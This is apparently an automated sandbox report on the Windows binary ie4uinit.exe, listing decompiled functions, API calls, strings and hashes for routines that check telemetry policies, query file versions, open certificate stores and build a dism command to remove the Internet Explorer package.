SysFreeString.OLEAUT32 ref: 00007FF7319C633D
SHRegDeleteUSValueW.SHLWAPI ref: 00007FF7319C6376

Strings

\Microsoft\Internet Explorer, xrefs: 00007FF7319C61AF
`, xrefs: 00007FF7319C6278
CleanupTask, xrefs: 00007FF7319C6255, 00007FF7319C6368
Software\Microsoft\Internet Explorer\Setup, xrefs: 00007FF7319C6263, 00007FF7319C636F

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Variant$ClearInitString$AllocFreeValue$CreateDeleteHeapInstanceProcess
String ID: CleanupTask$Software\Microsoft\Internet Explorer\Setup$\Microsoft\Internet Explorer$`
API String ID: 897810773-2320231753
Opcode ID: 143230e032f696f2904f7df03b713a40c3903dd36b126ea5d91d8231c8fd185a
Instruction ID: 2382e394905a0f3d17a47c47c0fbe2ac1bad5b1651a1be2a0d9259b53bd6af7d
Opcode Fuzzy Hash: 143230e032f696f2904f7df03b713a40c3903dd36b126ea5d91d8231c8fd185a
Instruction Fuzzy Hash: 2AB18E22E08AC6A6FB01AF64D4543B8A3B0FF44B4DF848135DA8D076A9DFBCE545D760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF9DC Relevance: 33.4, APIs: 8, Strings: 11, Instructions: 123libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA0E
GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA26
GetProcAddress.KERNEL32(?,?,00000002,?,?,00000000,?,00007FF7319DDC05,?,?,?,?,?,7FFFFFFFFFFFFFFF,7FFFFFFFFFFFFFFF,00000000), ref: 00007FF7319DFA39
FreeLibrary.KERNEL32 ref: 00007FF7319DFB7E

Strings

LimitEnhancedDiagnosticDataWindowsAnalytics, xrefs: 00007FF7319DFAB2
ConfigureTelemetryOptInChangeNotification, xrefs: 00007FF7319DFAD0
DisableTelemetryOptInChangeNotification, xrefs: 00007FF7319DFAE4
policymanager.dll, xrefs: 00007FF7319DF9F7
ConfigureTelemetryOptInSettingsUx, xrefs: 00007FF7319DFA6D, 00007FF7319DFAB9
DisableTelemetryOptInSettingsUx, xrefs: 00007FF7319DFAFD
Software\Policies\Microsoft\Windows\DataCollection, xrefs: 00007FF7319DFB14
PolicyManager_FreeGetPolicyData, xrefs: 00007FF7319DFA2C
PolicyManager_GetPolicy, xrefs: 00007FF7319DFA1C
System, xrefs: 00007FF7319DFA77
onecore\base\telemetry\permission\product\telemetrypermission.cpp, xrefs: 00007FF7319DFB8C

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AddressLibraryProc$FreeLoad
String ID: ConfigureTelemetryOptInChangeNotification$ConfigureTelemetryOptInSettingsUx$DisableTelemetryOptInChangeNotification$DisableTelemetryOptInSettingsUx$LimitEnhancedDiagnosticDataWindowsAnalytics$PolicyManager_FreeGetPolicyData$PolicyManager_GetPolicy$Software\Policies\Microsoft\Windows\DataCollection$System$onecore\base\telemetry\permission\product\telemetrypermission.cpp$policymanager.dll
API String ID: 2256533930-1386432056
Opcode ID: 1be8aeec32eaafe52004e8364c04f33708575598bd7df91e6ee20870cfc2c023
Instruction ID: ef77bb282ca5bc82cb192a263085dfaef7298a852c66c9538b772dd27136631f
Opcode Fuzzy Hash: 1be8aeec32eaafe52004e8364c04f33708575598bd7df91e6ee20870cfc2c023
Instruction Fuzzy Hash: F4514062E08783A5EB14AF11D854275A3A1BB44B9CF808135DD0D4779CEFBCE445E370

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DAD28 Relevance: 30.2, APIs: 20, Instructions: 181
fileCOMMON

Download Yara Rule

C-Code - Quality: 16%

			E00007FF77FF7319DAD28(signed int __rbx, void* __rcx, long long __rdi, long long __rbp, long long __r14, void* _a8, void* _a16, void* _a24, void* _a32) {
				long _t32;
				long _t35;
				long _t38;
				long _t41;
				long _t44;
				long _t47;
				long _t50;
				long _t53;
				long _t56;
				void* _t59;
				long _t60;
				signed int _t63;
				void* _t68;
				signed int _t70;
				void* _t73;
				signed int _t75;
				void* _t78;
				signed int _t80;
				void* _t83;
				signed int _t85;
				void* _t135;
				void* _t153;
				void* _t158;

				_t135 = _t153;
				 *((long long*)(_t135 + 8)) = __rbx;
				 *((long long*)(_t135 + 0x10)) = __rbp;
				 *((long long*)(_t135 + 0x18)) = __rdi;
				 *((long long*)(_t135 + 0x20)) = __r14;
				if ( *(__rcx + 0x450) == 0) goto 0x319dad66;
				 *0x319e7038();
				 *(__rcx + 0x450) =  *(__rcx + 0x450) & __rbx;
				r14d = 1;
				r15d = 0x80070000;
				if ( *(__rcx + 0x430) == __rbx) goto 0x319dadf3;
				if (E00007FF77FF7319DD9AC(__rbx, __rcx) < 0) goto 0x319daf79;
				if (UnmapViewOfFile(_t158) == 0) goto 0x319dadad;
				 *(__rcx + 0x430) =  *(__rcx + 0x430) & 0x00000000;
				goto 0x319dadeb;
				_t32 = GetLastError();
				_t33 =  ==  ? r14d : _t32;
				_t95 =  ==  ? r14d : _t32;
				if (( ==  ? r14d : _t32) > 0) goto 0x319dadcd;
				_t68 =  ==  ? r14d : GetLastError();
				goto 0x319daddf;
				_t35 = GetLastError();
				_t36 =  ==  ? r14d : _t35;
				_t69 = ( ==  ? r14d : _t35) & 0x0000ffff;
				_t70 = ( ==  ? r14d : _t35) & 0x0000ffff | r15d;
				if (_t70 == 0x80070570) goto 0x319dade9;
				if (_t70 >= 0) goto 0x319dadf3;
				goto 0x319dadeb;
				if (0x80070570 < 0) goto 0x319daf79;
				if ( *(__rcx + 0x428) == 0) goto 0x319dae51;
				if (CloseHandle(??) == 0) goto 0x319dae13;
				 *(__rcx + 0x428) =  *(__rcx + 0x428) & 0x00000000;
				goto 0x319dae51;
				_t38 = GetLastError();
				_t39 =  ==  ? r14d : _t38;
				_t104 =  ==  ? r14d : _t38;
				if (( ==  ? r14d : _t38) > 0) goto 0x319dae33;
				_t73 =  ==  ? r14d : GetLastError();
				goto 0x319dae45;
				_t41 = GetLastError();
				_t42 =  ==  ? r14d : _t41;
				_t74 = ( ==  ? r14d : _t41) & 0x0000ffff;
				_t75 = ( ==  ? r14d : _t41) & 0x0000ffff | r15d;
				if (_t75 == 0x80070570) goto 0x319dae4f;
				if (_t75 >= 0) goto 0x319dae59;
				goto 0x319dae51;
				if (0x80070570 < 0) goto 0x319daf79;
				if ( *(__rcx + 0x420) == 0xffffffff) goto 0x319daeb8;
				if (CloseHandle(??) == 0) goto 0x319dae7a;
				 *(__rcx + 0x420) =  *(__rcx + 0x420) | 0xffffffff;
				goto 0x319daeb8;
				_t44 = GetLastError();
				_t45 =  ==  ? r14d : _t44;
				_t113 =  ==  ? r14d : _t44;
				if (( ==  ? r14d : _t44) > 0) goto 0x319dae9a;
				_t78 =  ==  ? r14d : GetLastError();
				goto 0x319daeac;
				_t47 = GetLastError();
				_t48 =  ==  ? r14d : _t47;
				_t79 = ( ==  ? r14d : _t47) & 0x0000ffff;
				_t80 = ( ==  ? r14d : _t47) & 0x0000ffff | r15d;
				if (_t80 == 0x80070570) goto 0x319daeb6;
				if (_t80 >= 0) goto 0x319daec0;
				goto 0x319daeb8;
				if (0x80070570 < 0) goto 0x319daf79;
				if ( *(__rcx + 0x418) == 0) goto 0x319daf1e;
				if (CloseHandle(??) == 0) goto 0x319daee0;
				 *(__rcx + 0x418) =  *(__rcx + 0x418) & 0x00000000;
				goto 0x319daf1e;
				_t50 = GetLastError();
				_t51 =  ==  ? r14d : _t50;
				_t122 =  ==  ? r14d : _t50;
				if (( ==  ? r14d : _t50) > 0) goto 0x319daf00;
				_t83 =  ==  ? r14d : GetLastError();
				goto 0x319daf12;
				_t53 = GetLastError();
				_t54 =  ==  ? r14d : _t53;
				_t84 = ( ==  ? r14d : _t53) & 0x0000ffff;
				_t85 = ( ==  ? r14d : _t53) & 0x0000ffff | r15d;
				if (_t85 == 0x80070570) goto 0x319daf1c;
				if (_t85 >= 0) goto 0x319daf22;
				goto 0x319daf1e;
				if (0x80070570 < 0) goto 0x319daf79;
				if ( *(__rcx + 0x410) == 0) goto 0x319daf79;
				if (CloseHandle(??) == 0) goto 0x319daf42;
				 *(__rcx + 0x410) =  *(__rcx + 0x410) & 0x00000000;
				goto 0x319daf79;
				_t56 = GetLastError();
				_t57 =  ==  ? r14d : _t56;
				_t131 =  ==  ? r14d : _t56;
				if (( ==  ? r14d : _t56) > 0) goto 0x319daf60;
				_t59 =  ==  ? r14d : GetLastError();
				goto 0x319daf72;
				_t60 = GetLastError();
				_t61 =  ==  ? r14d : _t60;
				_t62 = ( ==  ? r14d : _t60) & 0x0000ffff;
				_t63 = ( ==  ? r14d : _t60) & 0x0000ffff | r15d;
				_t88 =  !=  ? _t63 : 0x80070570;
				_t64 =  !=  ? _t63 : 0x80070570;
				return  !=  ? _t63 : 0x80070570;
			}

0x7ff7319dad28
0x7ff7319dad2b
0x7ff7319dad2f
0x7ff7319dad33
0x7ff7319dad37
0x7ff7319dad50
0x7ff7319dad59
0x7ff7319dad5f
0x7ff7319dad6b
0x7ff7319dad71
0x7ff7319dad7e
0x7ff7319dad8c
0x7ff7319dada1
0x7ff7319dada3
0x7ff7319dadab
0x7ff7319dadad
0x7ff7319dadb5
0x7ff7319dadb9
0x7ff7319dadbb
0x7ff7319dadc7
0x7ff7319dadcb
0x7ff7319dadcd
0x7ff7319dadd5
0x7ff7319dadd9
0x7ff7319daddc
0x7ff7319dade1
0x7ff7319dade5
0x7ff7319dade7
0x7ff7319daded
0x7ff7319dadfd
0x7ff7319dae07
0x7ff7319dae09
0x7ff7319dae11
0x7ff7319dae13
0x7ff7319dae1b
0x7ff7319dae1f
0x7ff7319dae21
0x7ff7319dae2d
0x7ff7319dae31
0x7ff7319dae33
0x7ff7319dae3b
0x7ff7319dae3f
0x7ff7319dae42
0x7ff7319dae47
0x7ff7319dae4b
0x7ff7319dae4d
0x7ff7319dae53
0x7ff7319dae64
0x7ff7319dae6e
0x7ff7319dae70
0x7ff7319dae78
0x7ff7319dae7a
0x7ff7319dae82
0x7ff7319dae86
0x7ff7319dae88
0x7ff7319dae94
0x7ff7319dae98
0x7ff7319dae9a
0x7ff7319daea2
0x7ff7319daea6
0x7ff7319daea9
0x7ff7319daeae
0x7ff7319daeb2
0x7ff7319daeb4
0x7ff7319daeba
0x7ff7319daeca
0x7ff7319daed4
0x7ff7319daed6
0x7ff7319daede
0x7ff7319daee0
0x7ff7319daee8
0x7ff7319daeec
0x7ff7319daeee
0x7ff7319daefa
0x7ff7319daefe
0x7ff7319daf00
0x7ff7319daf08
0x7ff7319daf0c
0x7ff7319daf0f
0x7ff7319daf14
0x7ff7319daf18
0x7ff7319daf1a
0x7ff7319daf20
0x7ff7319daf2c
0x7ff7319daf36
0x7ff7319daf38
0x7ff7319daf40
0x7ff7319daf42
0x7ff7319daf4a
0x7ff7319daf4e
0x7ff7319daf50
0x7ff7319daf5a
0x7ff7319daf5e
0x7ff7319daf60
0x7ff7319daf68
0x7ff7319daf6c
0x7ff7319daf6f
0x7ff7319daf76
0x7ff7319daf7e
0x7ff7319daf95

APIs

UnmapViewOfFile.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAD99
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DADAD
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DADBD
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DADCD
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DADFF
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE13
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE23
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE33
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE66
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE7A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE8A
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAE9A
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAECC
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAEE0
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAEF0
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAF00
CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAF2E
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAF42
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAF52
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,00007FF7319DB3AD), ref: 00007FF7319DAF60

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$CloseHandle$FileUnmapView
String ID:
API String ID: 3410133523-0
Opcode ID: e8b01738b157d96a1d51ad9e3cdd8c14ad3757a24c22c6e4bc133fb466b83468
Instruction ID: 792a09dad2e03901cf9727ff67baf90d6a332058443636a466827adca1838d78
Opcode Fuzzy Hash: e8b01738b157d96a1d51ad9e3cdd8c14ad3757a24c22c6e4bc133fb466b83468
Instruction Fuzzy Hash: 1C715152F09BC6A1FB547F6998C8379A394BF04B59F841178C61982198DFFCF8647230

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319DF540 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 123registryencryptionCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7319E0A8C: GetModuleFileNameW.KERNEL32 ref: 00007FF7319E0AC2
Part of subcall function 00007FF7319E0A8C: _wcsicmp.MSVCRT ref: 00007FF7319E0AE7

#690.IERTUTIL ref: 00007FF7319DF5A1
wcsncmp.MSVCRT ref: 00007FF7319DF5C1
RegOpenKeyExW.ADVAPI32 ref: 00007FF7319DF5F0
RegCreateKeyExW.ADVAPI32 ref: 00007FF7319DF62F
CertOpenStore.CRYPT32 ref: 00007FF7319DF655
GetLastError.KERNEL32 ref: 00007FF7319DF667
GetLastError.KERNEL32 ref: 00007FF7319DF676
RegCloseKey.ADVAPI32 ref: 00007FF7319DF69E
RegCloseKey.ADVAPI32 ref: 00007FF7319DF6A9
CertOpenStore.CRYPT32 ref: 00007FF7319DF6CF
GetLastError.KERNEL32 ref: 00007FF7319DF6E1
GetLastError.KERNEL32 ref: 00007FF7319DF6F0
GetLastError.KERNEL32 ref: 00007FF7319DF6FF

Strings

MSIEHistoryJournal, xrefs: 00007FF7319DF6B4
HistoryJournalCertificate, xrefs: 00007FF7319DF60E
HKCU\, xrefs: 00007FF7319DF5B5

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: ErrorLast$Open$CertCloseStore$#690CreateFileModuleName_wcsicmpwcsncmp
String ID: HKCU\$HistoryJournalCertificate$MSIEHistoryJournal
API String ID: 2454733814-1739054375
Opcode ID: 34361da2126696112a88f8a12165d097abf9b6d2354067e74d23ecbe089b6cea
Instruction ID: 571d9e78bbbe4dfcfa71e8f9852092bbb1db257176f14f17acdbb00a14e28211
Opcode Fuzzy Hash: 34361da2126696112a88f8a12165d097abf9b6d2354067e74d23ecbe089b6cea
Instruction Fuzzy Hash: 7351A632F0CB86A2E760AB61E895769A394EF84758FC44134D94D82A68DFFCE445A730

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319E0880 Relevance: 28.1, APIs: 10, Strings: 6, Instructions: 132
memoryCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E00007FF77FF7319E0880(signed int __eax, long long __rbx, void* __rcx, void* __r8, void* __r10) {
				void* _t40;
				void* _t51;
				signed int _t66;
				signed long long _t77;
				signed long long _t78;
				signed short* _t79;
				void* _t107;
				short* _t110;
				void* _t113;
				void* _t114;
				void* _t116;
				signed long long _t117;
				void* _t140;
				short* _t142;
				void* _t144;
				int _t147;

				 *((long long*)(_t116 + 0x10)) = __rbx;
				_t2 = _t116 - 0x1f; // -141
				_t114 = _t2;
				_t117 = _t116 - 0xe0;
				_t77 =  *0x319f4658; // 0x8be7dd1f02a
				_t78 = _t77 ^ _t117;
				 *(_t114 + 0xf) = _t78;
				r12d = r9d;
				__imp__GetFileVersionInfoSizeExW();
				r13d = 0;
				_t66 = __eax;
				if (__eax == 0) goto 0x319e0a62;
				_t40 = LocalAlloc(_t147);
				if (_t78 == 0) goto 0x319e0a62;
				r8d =  *((intOrPtr*)(_t117 + 0x40));
				r9d = _t66;
				 *(_t117 + 0x20) = _t78;
				__imp__GetFileVersionInfoExW();
				if (_t40 == 0) goto 0x319e0a59;
				_t9 = _t117 + 0x30; // -62
				 *(_t117 + 0x38) = _t142;
				if (VerQueryValueW(_t144, _t142) == 0) goto 0x319e0a2a;
				_t79 =  *((intOrPtr*)(_t114 - 0x79));
				_t111 = L"FileVersion";
				 *((long long*)(_t117 + 0x28)) = L"FileVersion";
				_t14 =  &(_t142[0x1e]); // 0x3c
				r14d = _t14;
				r9d =  *_t79 & 0x0000ffff;
				 *(_t117 + 0x20) = _t79[1] & 0x0000ffff;
				_t17 = _t114 - 0x71; // -254
				E00007FF77FF7319C1394(_t41, _t17, L"\\VarFileInfo\\Translation", L"\\StringFileInfo\\%04X%04X\\%s", _t9, _t140);
				_t20 = _t114 - 0x71; // -254
				if (VerQueryValueW(_t107, _t110) != 0) goto 0x319e0a2a;
				_t21 = _t114 - 0x71; // -254
				E00007FF77FF7319C1394(_t43, _t21, _t20, L"\\StringFileInfo\\040904B0\\%s", L"FileVersion", _t113);
				_t24 = _t114 - 0x71; // -254
				if (VerQueryValueW(??, ??, ??, ??) != 0) goto 0x319e0a2a;
				_t25 = _t114 - 0x71; // -254
				E00007FF77FF7319C1394(_t45, _t25, _t24, L"\\StringFileInfo\\040904E4\\%s", L"FileVersion");
				_t28 = _t114 - 0x71; // -254
				if (VerQueryValueW(??, ??, ??, ??) != 0) goto 0x319e0a2a;
				_t29 = _t114 - 0x71; // -254
				E00007FF77FF7319C1394(_t47, _t29, _t28, L"\\StringFileInfo\\04090000\\%s", _t111);
				VerQueryValueW(??, ??, ??, ??);
				asm("dec eax");
				 *(_t117 + 0x38) = _t78 &  *(_t117 + 0x38);
				goto 0x319e0a2f;
				if ( *(_t117 + 0x38) == 0) goto 0x319e0a59;
				__imp__StrTrimW();
				if ( *( *(_t117 + 0x38)) == r13w) goto 0x319e0a59;
				_t51 = E00007FF77FF7319C1310(__rbx, __r8, _t140,  *(_t117 + 0x38), __r10);
				LocalFree(??);
				return E00007FF77FF7319E38D0(_t51, _t79[1] & 0x0000ffff,  *(_t114 + 0xf) ^ _t117);
			}

0x7ff7319e0880
0x7ff7319e0890
0x7ff7319e0890
0x7ff7319e0895
0x7ff7319e089c
0x7ff7319e08a3
0x7ff7319e08a6
0x7ff7319e08ad
0x7ff7319e08c5
0x7ff7319e08cb
0x7ff7319e08ce
0x7ff7319e08d2
0x7ff7319e08de
0x7ff7319e08ea
0x7ff7319e08f0
0x7ff7319e08f9
0x7ff7319e08fc
0x7ff7319e0904
0x7ff7319e090c
0x7ff7319e0912
0x7ff7319e0917
0x7ff7319e0932
0x7ff7319e0938
0x7ff7319e093c
0x7ff7319e0943
0x7ff7319e0948
0x7ff7319e0948
0x7ff7319e095a
0x7ff7319e095e
0x7ff7319e0962
0x7ff7319e0966
0x7ff7319e0978
0x7ff7319e0984
0x7ff7319e0997
0x7ff7319e099b
0x7ff7319e09ad
0x7ff7319e09b9
0x7ff7319e09c8
0x7ff7319e09cc
0x7ff7319e09de
0x7ff7319e09ea
0x7ff7319e09f9
0x7ff7319e09fd
0x7ff7319e0a13
0x7ff7319e0a1b
0x7ff7319e0a23
0x7ff7319e0a28
0x7ff7319e0a32
0x7ff7319e0a3b
0x7ff7319e0a4a
0x7ff7319e0a52
0x7ff7319e0a5c
0x7ff7319e0a8a

APIs

GetFileVersionInfoSizeExW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E08C5
LocalAlloc.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E08DE
GetFileVersionInfoExW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E0904
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E092A
StrTrimW.SHLWAPI(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E0A3B

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E097C
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E09B1
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E09E2
VerQueryValueW.VERSION(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E0A13
LocalFree.KERNEL32(?,?,?,?,?,?,?,?,00007FF7319C5599), ref: 00007FF7319E0A5C

Strings

\StringFileInfo\04090000\%s, xrefs: 00007FF7319E09EF
FileVersion, xrefs: 00007FF7319E093C
\VarFileInfo\Translation, xrefs: 00007FF7319E0923
\StringFileInfo\%04X%04X\%s, xrefs: 00007FF7319E094C
\StringFileInfo\040904E4\%s, xrefs: 00007FF7319E09BE
\StringFileInfo\040904B0\%s, xrefs: 00007FF7319E098D

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: QueryValue$FileInfoLocalVersion$AllocFreeSizeTrim_vsnwprintf
String ID: FileVersion$\StringFileInfo\%04X%04X\%s$\StringFileInfo\04090000\%s$\StringFileInfo\040904B0\%s$\StringFileInfo\040904E4\%s$\VarFileInfo\Translation
API String ID: 386413036-2944779872
Opcode ID: d2fa5ca200306b7d4b1d8c421c51bec2d7dacae2eba604211984a6efdc1e01ff
Instruction ID: 2f23a8f472794aae9389462d301f714c542069aedd58cd8d51f4c2d1f51dea57
Opcode Fuzzy Hash: d2fa5ca200306b7d4b1d8c421c51bec2d7dacae2eba604211984a6efdc1e01ff
Instruction Fuzzy Hash: B5518122F1CAC6A5E750AF61E8145F9A360FB48B88F819032EE4E57A5CDF7CD509D720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5E58 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 105COMMON

Download Yara Rule

APIs

CompareStringOrdinal.KERNEL32 ref: 00007FF7319C5EAF
memset.MSVCRT ref: 00007FF7319C5ECD
memset.MSVCRT ref: 00007FF7319C5EDD
swscanf_s.MSVCRT ref: 00007FF7319C5F34
CompareStringOrdinal.KERNEL32 ref: 00007FF7319C5F6D
StrStrW.SHLWAPI ref: 00007FF7319C5F86
ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF7319C5FC8
fgetws.MSVCRT ref: 00007FF7319C5FFC
fclose.MSVCRT ref: 00007FF7319C600E

Strings

VER_IEMAJORVERSION.2, xrefs: 00007FF7319C5F78
(, xrefs: 00007FF7319C5F12
"%%windir%%\System32\dism.exe" /online /remove-package /packagename:%s, xrefs: 00007FF7319C5F9D
Microsoft-Windows-InternetExplorer-Package-TopLevel, xrefs: 00007FF7319C5EA8
', xrefs: 00007FF7319C5EE8
%%%us | %%%us, xrefs: 00007FF7319C5EF0
Superseded, xrefs: 00007FF7319C5F66

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CompareOrdinalStringmemset$EnvironmentExpandStringsfclosefgetwsswscanf_s
String ID: "%%windir%%\System32\dism.exe" /online /remove-package /packagename:%s$%%%us | %%%us$'$($Microsoft-Windows-InternetExplorer-Package-TopLevel$Superseded$VER_IEMAJORVERSION.2
API String ID: 3568001790-1226670232
Opcode ID: 3fb980c3e0f037b13c59d51143b5157cbb4791bf65fd9feb2f53475f35883871
Instruction ID: 7935cf20ed2f42697645f6c470f719808b1e3d58119cbd878c4e2729c0c7eea1
Opcode Fuzzy Hash: 3fb980c3e0f037b13c59d51143b5157cbb4791bf65fd9feb2f53475f35883871
Instruction Fuzzy Hash: A6413F71F186C2A5FB20AB20D8407E963A5FB5874CFC04135D98D47A88DFBCE605DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C7268 Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 151
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 48%

